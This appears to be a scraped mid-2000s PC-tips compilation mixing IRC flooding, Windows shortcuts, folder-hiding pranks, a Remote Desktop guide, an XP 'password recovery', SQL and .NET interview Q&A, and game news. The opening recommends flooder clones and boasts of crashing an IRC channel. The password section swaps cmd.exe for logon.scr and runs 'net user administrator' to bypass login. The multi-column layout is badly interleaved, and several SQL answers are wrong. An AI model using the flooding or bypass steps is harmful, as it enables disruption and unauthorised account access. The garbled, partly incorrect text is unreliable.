times on Gr-Net (nini.irc.gr).What you are lookin
for is Click 2.2 and can be found in [Nukers-
Flooders] section.

Flooder
There are some cool flooders that all they do is
connect clones (many fake irc users commin
from your pc) in the network and priv-message a
user , that causes excess flood quit :-) there is
also a choise on the flooder that you can message
a whole channel, i still remember gettin in #mp3
and flooding the !list command in the channel
with 50 clones , all the F-Servs were down , and
the channel was f***ed up.
 Best Keyboard Shortcuts
acessability shortcuts
Getting used to using your keyboard exclusively and leaving your
mouse behind will make you much more efficient at performing Right SHIFT for eight seconds........ Switch FilterKeys on and
any task on any Windows system. I use the following keyboard off.
shortcuts every day: Left ALT +left SHIFT +PRINT SCREEN....... Switch High
Contrast on and off.
Windows key + R = Run menu Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys
on and off.
This is usually followed by: SHIFT....... five times Switch StickyKeys on and off.
cmd = Command Prompt NUM LOCK...... for five seconds Switch ToggleKeys on and
iexplore + "web address" = Internet Explorer off.
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management explorer shortcuts
dnsmgmt.msc = DNS Management END....... Display the bottom of the active window.
services.msc = Services HOME....... Display the top of the active window.
eventvwr = Event Viewer NUM LOCK+ASTERISK....... on numeric keypad (*) Display
dsa.msc = Active Directory Users and Computers all subfolders under the selected folder.
dssite.msc = Active Directory Sites and Services NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display
Windows key + E = Explorer the contents of the selected folder.
ALT + Tab = Switch between windows NUM LOCK+MINUS SIGN....... on numeric keypad (-)
ALT, Space, X = Maximize window Collapse the selected folder.
CTRL + Shift + Esc = Task Manager LEFT ARROW...... Collapse current selection if it's expanded,
Windows key + Break = System properties or select parent folder.
Windows key + F = Search RIGHT ARROW....... Display current selection if it's
Windows key + D = Hide/Display all windows collapsed, or select first subfolder.
CTRL + C = copy
CTRL + X = cut Type the following commands in your Run Box (Windows
CTRL + V = paste Key + R) or Start Run

Also don't forget about the "Right-click" key next to the right devmgmt.msc = Device Manager
Windows key on your keyboard. Using the arrows and that key msinfo32 = System Information
can get just about anything done once you've opened up any cleanmgr = Disk Cleanup
program. ntbackup = Backup or Restore Wizard (Windows Backup
Utility)
Keyboard Shortcuts mmc = Microsoft Management Console
[Alt] and [Esc] Switch between running applications excel = Microsoft Excel (If Installed)
[Alt] and letter Select menu item by underlined letter msaccess = Microsoft Access (If Installed)
[Ctrl] and [Esc] Open Program Menu powerpnt = Microsoft PowerPoint (If Installed)
[Ctrl] and [F4] Close active document or group windows (does winword = Microsoft Word (If Installed)
not work with some applications) frontpg = Microsoft FrontPage (If Installed)
[Alt] and [F4] Quit active application or close current window notepad = Notepad
[Alt] and [-] Open Control menu for active document wordpad = WordPad
Ctrl] Lft., Rt. arrow Move cursor forward or back one word calc = Calculator
Ctrl] Up, Down arrow Move cursor forward or back one msmsgs = Windows Messenger
paragraph mspaint = Microsoft Paint
[F1] Open Help for active application wmplayer = Windows Media Player
Windows+M Minimize all open windows rstrui = System Restore
Shift+Windows+M Undo minimize all open windows netscp6 = Netscape 6.x
Windows+F1 Open Windows Help netscp = Netscape 7.x
Windows+Tab Cycle through the Taskbar buttons netscape = Netscape 4.x
Windows+Break Open the System Properties dialog box waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
internetbrowser
type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it
For Windows XP:
Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the
Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging
an item
Rename selected item. F2
Move the insertion point to the beginning of the next word.
CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word.
CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph.
CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous
paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow
keys
Select more than one item in a window or on the desktop, or
select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window.
ALT+SPACEBAR
Close the active document in programs that allow you to have
multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows
Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window.
ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a
menu name
Carry out the corresponding command. Underlined letter in a
command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT
ARROW
Open the next menu to the left, or close a submenu. LEFT
ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows
Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the
CD from automatically playing.
Use these keyboard shortcuts for dialog boxes:
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the
corresponding option. ALT+Underlined letter
Carry out the command for the active option or button.
ENTER
Select or clear the check box if the active option is a check
box. SPACEBAR
Select a button if the active option is a group of option
buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the
Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other
compatible keyboard that includes the Windows logo key
and the Application key , you can use these keyboard
shortcuts:
Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN
Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network
domain, or switch users if you are not connected to a
network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight
seconds
Switch High Contrast on and off. Left ALT+left
SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT
+NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five
seconds
Open Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM
LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM
LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN
on numeric keypad (-)
Collapse current selection if it's expanded, or select parent
folder. LEFT ARROW
Display current selection if it's collapsed, or select first
subfolder. RIGHT ARROW
 How to hide your data on your Windows Machine
Some of the older windows users who are familar with the NULL How to make files Un-Deletable with
DOS Character (255) may know this other then that not many
people are aware of how to do such a thing. i use to do this trick FlashFXP
at school to friends pc's and also whenever i might have been in a
PC store just for fun make a folder on the desktop called Start FlashFXP..
'Hardcore Anal Sex' or something and see if the PC store dudes Go to Commands > Edit Custom Commands
worked out how to get rid of it next time i was there Smile Klik on: new cmd
Ok so this is how it works. in windows(DOS) there is 255 DOS Give it a name like: Make undeletable or something
Characters. by going into DOS/CMD and holding down Then in the text area above the buttons typ this:
(ALT+157) pressing 157 on the number pad. a weird character Code:
should appear. this is one of many. if you havent used a charmap
before try going to start/run and typing 'charmap' which willopen {
the windows character map, if you select a character u will see in rnfr %f
teh bottom of the window it has ALT+some_numbers which is rnto %f ./ /
the number code for that character. and because most standard }
keyboards only have around 108keys there must be character
codes Smile Hit OK..

Connect to a server..
Click right on a map or file en go to commands > make
undeletable..

And you're file is deletable.

ok so how does this help you protect your data? well if you were
to name a folder one of these character then windows wouldnt
know how to open it!. not all charcter but mainly characters that
are equivelent to NULL.. NULL looks like this ' ' nothing but a
space. like hitting space bar once, totally blank!..
ok so if you go to DOS and type cd C:\windows\desktop or what
ever. just go to a directory you can visually access and see later
on a physical drive (i.e. not D:\ or A:\).. ok so your in your
desktop.
now make a directory. `mkdir secretALT+255dir` now where
ALT+255 u have to hold down ALT and press 255 in your
number pad, it will just appear as tho u hit space bar once. now
go to your desktop and try to open/delete/rename this folder.
IMPOSSIBLE!! Smile the dir is completely locked and
untouchable by all forces of life (except for DOS at this stage). so
lets presume you have locked all your porno in there and your
parents have gone out and u want to watch some Smile. now you
have to go back into dos and rename the file to a normal name...
cd C:\windows\desktop
rename secretALT+255dir Folder_new_name
now you your folder should be back to normal and can be
accessed again.
hit F5 if you see no changes. Smile

have fun.
 How To Remotely Access Your PC
Windows XP Professional includes a basic PC remote
control tool which lets you log onto your PC remotely from
anywhere. Do you know how to use it?
It’s called Remote Desktop Connection, and when you’ve
properly configured your PC, this handy utility will let you
log into your computer from anywhere in the world and
control it as if you were sitting in front of it instead of half a
world away.
If you’re running Windows XP Professional, you already
have all the software you need to connect remotely to your
PC. Whether you’d like to monitor a server, grab files from
your home PC at work, or just keep an eye on your machines
when you’re out, connecting remotely is easy to do.
However, due to the vagaries of network configurations and
various other quirks beyond your control, you may not be
able to actually connect. Until now.
Prepping your system
First, you need to know the IP address of the computer you
want to connect to. The only sure-fire way to always be able
to connect to your PC’s is to use an ISP that provides you
with a static IP address. Most ISPs give customers dynamic
IP addresses, which can change every few days or even
hours. Because your IP address is the way you’ll locate your
computer on the net, you’ll need to know what your IP
address is and monitor it as it changes.
The good news is that there are loads of programs that will
notify you of IP address changes, whenever they occur. We
like IP Address Monster (www.ipmonster.com). It’s a small
program that runs in your system tray and can be configured
to e-mail you whenever your IP address changes.
IP Address Monster should be your first stop to remote
connectivity. This handy utility will keep tabs on your
Internet address and send you an e-mail whenever it changes.
Now that you know your IP address, you need to make sure
that Remote Desktop Connection is enabled. Make sure your
firewall is configured to allow incoming connections on port
3389 (firewalls vary, so check your documentation to find
out how to open the port).
You can turn on Remote Desktop Connection in the System
Control Panel (Start, Control Panel, System). Check the
Remote tab and make sure “Allow users to connect remotely
to this computer” is checked. You’ll also need to have at
least one user account that requires a password because
accounts without passwords are prohibited from logging into
Remote Desktop.
To enabling Remote Desktop, open the System Control
Panel, go to the Remote tab, and check this box.
It’s important to make sure the passwords on the machine
you’re going to remotely log into are “good” ones. This
means you should use a mixture of letters and numbers,
avoid words that are found in dictionaries, and change the
password regularly to protect yourself from mischief.
Making the connection
At this point, your PC should be prepped and patiently
waiting for a connection. To log in, you need to open the
Remote Desktop Connection client on your remote PC. Go
to Start, Programs, Accessories, Communications, Remote
Desktop Connection. Input the IP address you want to
connect to (courtesy of IP Address Monster) in the Computer
field. Then enter your username and password.
Now you’ll want to tweak a few settings to optimize your
remote experience. Whiz-bang features gobble up
bandwidth, so you should tune your settings to match your
home net connection. We recommend you start with a
minimal feature set. Press the Options button, then the
Display tab. Change the display settings to full-screen, 256-
color. This looks acceptable and consumes practically no
bandwidth. You’ll also want to browse to the Experience tab
and change the Performance setting to reflect your home
PC’s connection speed.
Switching to a lower color resolution and a smaller display
area will greatly minimize the amount of data that has to
transfer between your computer and the remote PC.
Once you’ve tuned the connection a bit, you’re ready to
connect. Press the Connect key and you’re in!
What to do next
At this point, you should be connected. You can run
programs and manipulate files just like you’re sitting in front
of your PC. In fact, you can even use your PC’s e-mail and
web browsers. Do you want to start downloading Desert
Combat now so you can start playing it when you get home?
That’s easy enough; just log into your PC using Remote
Desktop, open your web browser, and download the file. It
will be sitting on your machine waiting for you as soon as
you get home. If all your PCs are running Windows XP Pro,
and you enable drive-sharing in the Local Resources tab, you
can transfer files from remote PC to local PC. You can even
remotely transfer files between local PCs on your home
network.
Once connected, you can interact with printer ports and
networked hard drives. This is a handy way to delete those
“special interest” videos you downloaded before your wife
finds them.
 FORGOT YOUR PASSWORD ON XP? HERE'S
WHAT TO DO!
Have you forgotten your password and you don't want to re-
format your computer?
Well here's what you do.. Please note that this only works on
Windows XP!
PLEASE READ CAREFULLY!
1. Restart you computer
2.When booting, press F8 and select "Safe Mode"
3.After getting to the user menu. Click on a user and this
time it will not ask you for a password
4.Go to Start>Run and type "CMD" (without the quotes).
5.At command prompt type in "cd C:\Windows\System32"
(without the quotes), I am assuming C is your
System/Windows Drive
6.For safety purposes first make a backup of your Logon.Scr
file.. You can do this by typing in "Copy to Logon.scr to
Logon.bak" (without the quotes)
7.Then type "copy CMD.EXE Logon.scr"(without the
quotes)
8.Then type this command, I will assume that you want to set
Administrator's password to "MyNewPass" (without the
quotes)
9.Now, type this in (I am assuming that you are still in the
directory C:\Windows\System32) , "net user administrator
MyNewPass" without the quotes
10. You will get a message saying that it was successful, this
means Administrator's new password is "MyNewPass"
(without the quotes)
11. Restart the PC and you will login as Administrator (or
whatever you chose to reset) with your chosen password and
Enjoy!
Track Ip Connected To Ur Pc
Open notepad and copy and paste the following
commands in it and save it as getip.cmd
Code:
@echo.
@color 09
@netstat -n
@echo.
@pause
Now execute this file (double click) and you can see
your IP in the command prompt.
It works only in NT based OS.
How to speed up your firefow
browser
1. Type "about:config" into the address bar and hit
return. Scroll down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normally the browser will make one request to a web
page at a time. When you enable pipelining it will make
several at once, which really speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
set "network.http.pipelining.maxrequests" to some
number like 30. This means it will make 30 requests at
once.
3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to
"0". This value is the amount of time the browser waits
before it acts on information it recieves.
 7. WHAT ARE HIERARCHICAL, NETWORK, AND
RELATIONAL DATABASE MODELS?
Ans: a) Hierarchical Model: The Hierarchical Model was
introduced in the Information Management System (IMS)
developed by IBM in 1968. In this data is organized as a
tree structure. Each tree is made of nodes and branches.
The nodes of the tree represent the record types and it is a
collection of data attributes entity at that point. The
topmost node in the structure is called the root. Nodes
succeeding lower levels are called children.
Network Model: The Network Model, also called as the
CODSYL database structure, is an improvement over the
1. WHAT IS DATA OR INFORMATION?
Hierarchical mode, in this model concept of parent and
Ans: The Matter that we feed into the Computer is
child is expanded to have multiple parent-child
called Data or Information.
relationships, i.e. any child can be subordinate to many
2. WHAT IS DATABASE?
different parents (or nodes). Data is represented by
Ans: The Collection of Interrelated Data is called Data
collection of records, and relationships among data are
Base.
represented by links. A link is an association between
3. WHAT IS A DATABASE MANAGEMENT
precisely two records. Many-to-many relationships can
SYSTEM (DBMS) PACKAGE?
exists between the parent and child.
Ans: The Collection of Interrelated Data and some
c) Relational Model: The Relational Database Model
Programs to access the Data is Called Data Base
eliminates the need for explicit parent-child relationships.
Management System (DBMS).
In RDBMS, data is organized in two-dimensional tables
4. WHEN CAN WE SAY A DBMS PACKAGE AS
consisting of relational, i.e. no pointers are maintained
RDBMS?
between tables.
Ans: For a system to Qualify as RELATIONAL
8. WHAT IS DATA MODELING?
DATABASE MANAGEMENT system, it must use its
Ans: Data Modeling describes relationship between the
RELATIONAL facilities to MANAGE the
data objects. The relationships between the collections of
DATABASE.
data in a system may be graphically represented using data
5. WHAT IS ORDBMS?
modeling.
Ans: Object (oriented) Relational Data Base
9. DEFINE ENTITY, ATTRIBUTE AND
Management System is one that can store data, the
RELATIONSHIP.
relationship of the data, and the behavior of the data
Ans: Entity: An Entity is a thing, which can be easily
(i.e., the way it interacts with other data).
identified. An entity is any object, place, person, concept
6. NAME SOME CODD'S RULES.
or activity about which an enterprise records data.
Ans: Dr. E.F. Codd presented 12 rules that a database
Attribute: An attribute is the property of a given entity.
must obey if it is to be considered truly relational. Out
Relationship: Relationship is an association among
those, some are as follows
entities.
a) The rules stem from a single rule- the ‘zero rule’: For
10. WHAT IS ER-MODELING?
a system to Qualify as RELATIONAL DATABASE
Ans: The E-R modeling technique is the Top Down
MANAGEMENT system, it must use its
Approach. Entity relationship is technique for analysis and
RELATIONAL facilities to MANAGE the DATABASE
logical modeling of a system’s data requirements. It is the
Information Rule: Tabular Representation of
most widely used and has gained acceptance as the
Information.
ideal database design. It uses three basic units: entities,
c) Guaranteed Access Rule: Uniqueness of tuples for
their attributes and the relationship that exists between
guaranteed accessibility.
the entities. It uses a graphical notation for representing
d) Missing Information Rule: Systematic representation
these.
of missing information as NULL values.
11. WHAT IS NORMALIZATION?
e) Comprehensive Data Sub-Language Rule: QL to
Ans: Normalization is a step-by-step decomposition of
support Data definition, View definition, Data
manipulation, Integrity, Authorization and Security. complex records into simple records.
11. WHAT IS NORMALIZATION?
Ans: Normalization is a step-by-step decomposition of
complex records into simple records.
12. WHAT ARE VARIOUS NORMAL FORMS OF
DATA?
Ans: The First Normal Form 1NF, The Second Normal
Form 2NF, The Third Normal Form 3NF, The Boyce
and Codd Normal Form BC NF.
13. WHAT IS DENORMALIZATION?
Ans: The intentional introduction of redundancy to a
table to improve performance is called
DENORMALIZATION.
14. WHAT ARE 1-TIER, 2-TIER, 3-TIER OR N-
TIER DATABASE ARCHITECTURES?
Ans: 1-Tier Database Architecture is based on single
system, which acts as both server and client. 2-Tier
Architecture is based on one server and client. 3-Tier
Architecture is based on one server and client out that on
client act as a remote system. N-Tier Architecture is
based on N no. Of servers and N no. Of clients.
15. WHAT ARE A TABLE, COLUMN, AND
RECORD?
Ans: Table: A Table is a database object that holds your
data. It is made up of many columns. Each of these
columns has a data type associated with it. Column: A
column, referred to as an attribute, is similar to a field in
the file system. Record: A row, usually referred to as
tuple, is similar to record in the file system.
16. WHAT IS DIFFERENCE BETWEEN A
PROCEDURAL LANGUAGE AND A
NON-PROCEDURAL LANGUAGE?
Ans:
Procedural Language NON-Procedural Language
A program in this implements a step-by-step algorithm
to solve the problem. It contains what to do but not how
to do
17.WHAT TYPE OF LANGUAGE "SQL" IS?
Ans: SQL is a Non-procedural, 4th generation
Language,/ which concerts what to do rather than how to
do any process.
18. CLASSIFICATION OF SQL COMMANDS?
Ans: DDL (Data Definition Language) DML (Data
Manipulating Language) DCL (Data Control
Language) DTL(Data Transaction Language)
Create Alter Drop Select Insert Update Delete Rollback
Commit Grant Revoke
19. WHAT IS DIFFERENCE BETWEEN DDL AND
DML COMMANDS?
Ans: For DDL commands autocommit is ON implicitly
whereas For DML commands autocommit is to be
turned ON explicitly.
20. WHAT IS DIFFERENCE BETWEEN A
TRANSACTION AND A QUERY?
Ans: A Transaction is unit of some commands where as
Query is a single line request for the information from
the database.
21. WHAT IS DIFFERENCE BETWEEN
TRUNCATE AND DELETE COMMANDS?
Ans: Truncate Command will delete all the records
where as Delete Command will delete specified or all
the records depending only on the condition given.
22. WHAT IS DIFFERENCE BETWEEN UPDATE
AND ALTER COMMANDS?
Ans: Alter command is used to modify the database
objects where as the Update command is used to modify
the values of a data base objects.
23. WHAT ARE COMMANDS OF TCL
CATEGORY?
Ans: Grant and Revoke are the two commands belong to
the TCL Category.
24. WHICH IS AN EFFICIENT COMMAND -
TRUNCATE OR DELETE? WHY?
Ans: Delete is the efficient command because using this
command we can delete only those records that are not
really required.
25. WHAT ARE RULES FOR NAMING A TABLE
OR COLUMN?
Ans: 1) Names must be from 1 to 30 bytes long.
2) Names cannot contain quotation marks.
3) Names are not case sensitive.
4) A name must begin with an alphabetic character from
your database character set and the characters $ and #.
But these characters are discouraged.
5) A name cannot be ORACLE reserved word.
6) A name must be unique across its namespace. Objects
in the name space must have different names.
7) A name can be enclosed in double quotes.
OT: Official
Name for
Windows 26. HOW MANY COLUMNS CAN A TABLE 34. WHAT IS A CONSTRAINT? WHAT ARE
"Longhorn" HAVE? ITS VARIOUS LEVELS?
Announced Ans: A Table can have 1000 columns. Ans: Constraint: Constraints are representators of
27. WHAT ARE DIFFERENT DATATYPES the column to enforce data entity and
The next version SUPPORTED BY SQL? consistency.There r two levels
of Windows Ans: Char (size), Nchar (size), Varchar2 (size),
finally has an 1)Column-level constraints 2)Table-level
official name: Nvarchar2 (size) data types for character values, constraints.
Windows Vista. Number (precision, scale), Number, Number (n), Float, 35. LIST OUT ALL THE CONSTRAINTS
The advertising Float (binary precision) data types for numerical values, SUPPORTED BY SQL.
tagline for Vista Date data type for date values, Long, Raw (size), Long
is "Clear, Ans: Not Null, Unique, Check, Primary Key and
Confident, Raw, Clob, Blob, Nclob, Bfile for large objects. Foreign Key or Referential Integrity.
Connected: 28. WHAT IS DIFFERENCE BETWEEN LONG 36. WHAT IS DIFFERENCE BETWEEN
Bringing clarity AND LOB DATATYPES? UNIQUE+NOT NULL AND PRIMARY KEY?
to your world," Ans: LOB LONG
according to a Ans: Unique and Not Null is a combination of two
video of the 1) The maximum size is 4GB. Constraints that can be present any number of times
announcement 2) LOBs (except NCLOB) can be attributes of an object in a table and can’t be a referential key to any
posted by type. column of an another table where as Primary Key is
Microsoft. 3) LOBs support random access to data. single Constraint that can be only once for table and
4) Multiple LOB columns per table or LOB attributes in can be a referential key to a column of another table
an object type. becoming a referential integrity.
1) The maximum size is 2GB. 2) LONGs cannot. 3) 37. WHAT IS A COMPOSITE PRIMARY
LONGs support only sequential access. KEY?
4) Only one LONG column was allowed in a table Ans: A Primary key created on combination of
29. WHAT IS DIFFERENCE BETWEEN CHAR columns is called Composite Primary Key.
AND VARCHAR2 DATATYPES? 39. HOW TO DEFINE A NULL VALUE?
Ans: Varchar2 is similar to Char but can store variable Ans: A NULL value is something which is
no. Of characters and while querying the table varchar2 unavailable, it is neither zero nor a space and any
trims the extra spaces from the column and fetches the mathematical calculation with NULL is always
rows that exactly match the criteria. NULL.
30. HOW MUCH MEMORY IS ALLOCATED FOR 40. WHAT IS NULL? A CONSTRAINT OR
The company also DATE DATATYPE? WHAT IS DEFAULT DEFAULT VALUE?
said Friday that the DATE FORMAT IN ORACLE? Ans: It is a default value.
first beta, or test Ans: For Date data type oracle allocates 7 bytes
release, of Vista is 41. WHAT IS DEFAULT VALUE FOR EVERY
Memory. Default Date Format is: DD-MON-YY. COLUMN OF A TABLE?
slated for release by
Aug. 3. That release 31. WHAT IS RANGE FOR EACH DATATYPE OF Ans: NULL.
will be targeted at SQL? 42. WHAT IS CREATED IMPLICITLY FOR
developers and IT Ans: Datatype Range Char Varchar2 Number Float
professionals, said EVERY UNIQUE AND PRIMARY KEY
LONG, RAW, LONGRAW Large Objects (LOB’s) COLUMNS?
Brad Goldberg,
general manager of 2000 bytes 4000 bytes Precision 1 to 38 Scale -84 to 127 Ans: Index.
Windows product Precision 38 decimals Or 122 binary precision 2 GB 43. WHAT ARE LIMITATIONS OF CHECK
development ... The 4GB
software giant spent CONSTRAINT?
32. HOW TO RENAME A COLUMN? Ans: In this we can't specify Pseudo Columns like
roughly eight
months researching Ans: We can’t rename a Column of a table directly. So sysdate etc.
potential names for we follow the following steps. To Rename a Column: 44. WHAT IS DIFFERENCE BETWEEN
the upcoming a) Alter the table specifying new column name to be
version of REFERENCES AND FOREIGN KEY
given and data type. Then copy the values in the column CONSTRAINT?
Windows.
to be renamed into new column. Ans: References is used as column level key word
c) drop the old column. where as foreign key is used as table level
33. HOW TO DECREASE SIZE OR CHANGE constraint.
DATATYPE OF A COLUMN? 45. WHAT IS "ON DELETE CASCADE"?
Ans: To Decrease the size of a Data type of a column Ans: when this key word is included in the
i. Truncate the table first. definition of a child table then whenever the records
ii. Alter the table column whose size is to be decreased from the parent table is deleted automatically the
using the same name and data type but new size. respective values in the child table will be deleted.
46. WHAT IS PARENT-CHILD OR MASTER-
DETAIL RELATIONSHIP?
Ans: A table which references a column of another
table(using References)is called as a child table(detail
table) and a table which is being referred is called
Parent (Master) Table .
47. HOW TO DROP A PARENT TABLE WHEN
IT’S CHILD TABLE EXISTS?
Ans: Using "on delete cascade".
48. IS ORACLE CASE SENSITIVE?
Ans: NO
49. HOW ORACLE IDENTIFIES EACH
RECORD OF TABLE UNIQUELY?
Ans: By Creating indexes and reference IDs.
50. WHAT IS A PSEUDO-COLUMN? NAME
SOME PSEUDO-COLUMNS OF ORACLE?
Ans: Columns that are not created explicitly by the
user and can be used explicitly in queries are called
Pseudo-Columns.
Ex:currval,nextval,sysdate….
51. WHAT FOR "ORDER BY" CLAUSE FOR A
QUERY?
Ans: To arrange the query result in a specified
order(ascending,descending) by default it takes
ascending order.
52. WHAT IS "GROUP BY" QUERIES?
Ans: To group the query results based on condition.
53. NAME SOME AGGREGATE FUNCTIONS
OF SQL?
Ans: AVG, MAX, SUM, MIN,COUNT.
54. WHAT IS DIFFERENCE BETWEEN COUNT
(), COUNT (*) FUNCTIONS?
Ans: Count () will count the specified column whereas
count (*) will count total no. of rows in a table.
55. WHAT FOR ROLLUP AND CUBE
OPERATORS ARE?
Ans: To get subtotals and grand total of values of a
column.
56. WHAT IS A SUB-QUERY?
Ans: A query within a query is called a sub query
where the result of inner query will be used by the
outer query.
57. WHAT ARE SQL OPERATORS?
Ans: Value (), Ref () is SQL operator.
58. EXPLAIN
"ANY","SOME","ALL","EXISTS"
OPERATORS?
Ans: Any: The Any (or it’s synonym SOME) operator
computes the lowest value from the set and compares
a value to each returned by a sub query. All: ALL
compares a value to every value returned by SQL.
Exists: This operator produces a BOOLWAN results.
If a sub query produces any result then it evaluates it
to TRUE else it evaluates it to FALSE.
59. WHAT IS A CORRELATED SUB QUERY,
HOW IT IS DIFFERENT FROM A NORMAL
SUB QUERY?
Ans: A correlated subquery is a nested subquery,
which is executed once for each ‘Candidate row’ by
the main query, which on execution uses a value from
a column in the outer query. In normal sub query the
result of inner query is dynamically substituted in the
condition of the outer query where as in a correlated
subquery, the column value used in inner query refers
to the column value present in the outer query forming
a correlated subquery.
60. WHAT IS A JOIN - TYPES OF JOINS?
Ans: A join is used to combine two or more tables
logically to get query results. There are four types of
Joins namely EQUI Join NON-EQUI Join SELF Join
OUTER Join.
61. WHAT ARE MINIMUM REQUIREMENTS
FOR AN EQUI-JOIN?
Ans: There shold be atleast one common column
between the joining tables.
62. WHAT IS DIFFERENCE BETWEEN LEFT,
RIGHT OUTER JOIN?
Ans:If there r any values in one table that do not have
corresponding values in the other,in an equi join that
row will not be selected.Such rows can be forcefully
selected by using outer join symbol(+) on either of the
sides(left or right) based on the requirement.
63. WHAT IS DIFFERENCE BETWEEN EQUI
AND SELF JOINS?
Ans: SELF JOIN is made within the table whereas
EQUI JOIN is made between different tables having
common column.
64. WHAT ARE "SET" OPERATORS?
Ans: UNION, INTERSECT or MINUS is called SET
OPERATORS.
65. WHAT IS DIFFERENCE BETWEEN
"UNION" AND "UNION ALL" OPERATORS?
Ans: UNION will return the values distinctly whereas
UNION ALL will return even duplicate values.
****END of Part 1****
****Will continue in next issue****
What platforms do .NET XML Web Services run on?
Currently, they're supported on Windows 2000 and Windows
XP. ASP.NET integrates with Internet Information Server
(IIS) and thus requires that IIS be installed. It runs on server
and non-server editions of Windows 2000 and XP as long as
IIS is installed.
Can two different programming languages be mixed in a
single ASMX file?
No.
What is code-behind?
Code-behind allows you to associate Web Service source code
written in a CLR compliant language (such as C# or VB.NET)
as compiled in a separate file (typically *.asmx.cs or
*.asmx.vb). You would otherwise typically find the executable
code directly inserted into the .asmx file.
What namespaces are imported by default in ASMX files?
The following namespaces are imported by default. Other
namespaces must be imported manually.· System,
System.Collections,System.ComponentModel,System.Data,
System.Diagnostics,System.Web,System.Web.Services
How do I provide information to the Web Service when the
information is required as a SOAP Header?
The key here is the Web Service proxy you created using
wsdl.exe or through Visual Studio .NET's Add Web Reference
menu option. If you happen to download a WSDL file for a
Web Service that requires a SOAP header, .NET will create a
SoapHeader class in the proxy source file. Using the previous
example:
public class Service1 :
System.Web.Services.Protocols.SoapHttpClientProtocol
{
public AuthToken AuthTokenValue;

[System.Xml.Serialization.XmlRootAttribute(Namespace="http
://tempuri.org/", IsNullable=false)]
public class AuthToken : SoapHeader { public
string Token; }}
In this case, when you create an instance of the proxy in your
main application file, you'll also create an instance of the
AuthToken class and assign the string:
Service1 objSvc = new Service1();
processingobjSvc.AuthTokenValue = new AuthToken();
objSvc.AuthTokenValue.Token = <actual token value>;
Web Servicestring strResult =
objSvc.MyBillableWebMethod();
What is WSDL?
WSDL is the Web Service Description Language, and it is
implemented as a specific XML vocabulary. While it's very
much more complex than what can be described here, there are
two important aspects to WSDL with which you should be
aware. First, WSDL provides instructions to consumers of
Web Services to describe the layout and contents of the SOAP
packets the Web Service intends to issue. It's an interface
description document, of sorts. And second, it isn't intended
that you read and interpret the WSDL. Rather, WSDL should
be processed by machine, typically to generate proxy source
code (.NET) or create dynamic proxies on the fly (the SOAP
Toolkit or Web Service Behavior).
 Rome: Total War Barbarian Invasion
Barbarian Invasion sweeps Europe,
North America
Sega ships Rome: Total War expansion; add-on takes place
200 years after original game, features 10 new factions, night
battles, and more.
The union of Sega and The Creative Assembly has yielded
its first fruit today, as the Rome: Total War Barbarian
Invasion expansion pack is now headed to retailers across
Europe and North America.
Set 200 years after the main campaign of Rome: Total War,
Barbarian Invasion sees the outsider hordes massing on the
borders of a declining Roman Empire. It's up to players to
decide whether they will save Rome from its enemies or
simply sack it. In addition to the new campaign mode,
Barbarian Invasion adds new features and units to the real-
time strategy game. There are 10 new factions, more than
100 new units, night battles, revamped artificial intelligence
in battles, and more.
Rome: Total War - Barbarian Invasion
E3 2005 Impressions
Excellent news: One of the best strategy games of 2004 is
getting an expansion.
PC strategy fans got a major shock earlier this year when
Sega acquired British developer Creative Assembly, the
creator of the acclaimed Total War series of strategy
games. To make things even worse, Sega promptly
announced that CA's next game would be a hybrid
action/strategy game developed for the consoles. Was
nothing sacred? Well, the Creative Assembly folks haven't
turned their backs on the PC, and the company is still
plugging away on the platform that made them. It is also
